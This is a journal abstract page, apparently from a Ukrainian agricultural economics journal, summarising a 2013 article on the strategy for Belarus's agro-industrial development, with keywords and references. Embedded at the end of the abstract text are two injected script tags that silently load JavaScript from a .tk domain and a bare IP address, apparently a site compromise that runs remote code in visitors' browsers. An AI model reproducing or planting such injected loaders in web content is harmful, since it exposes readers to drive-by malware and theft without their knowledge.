ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.145(476)
Зарубіжний досвід розвитку аграрного виробництва

Стратегія перспективного розвитку агропромислового виробництва Білорусі / // Економіка АПК. - 2013. - № 1 - С. 118

Визначено завдання та пріоритети розвитку національного АПК при входженні країни в Єдиний економічний простір, вирішення яких має здійснюватися на основі прискореного розвитку інноваційно-інвестиційної діяльності та коопераційно- інтеграційних процесів у сфері агропромислового виробництва. Табл.: 1. Бібліогр.: 2.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: агропромисловий комплекс, продовольча система, конкурентоспроможність, інноваційно-інвестиційний розвиток, кооперація та інтеграція, ефективність

Список використаних джерел

  1. Государственная программа возрождения и развития села на 2005-2010 годы. - Минск: Изд-во «Беларусь», 2005. - 96 с.
  2. Государственная программа устойчивого развития села на 2011-2015 годы: - Минск: ГИВЦ Минсельхозпрода, 2011. - 86 с.
Читати статтю: 13_01_18.pdf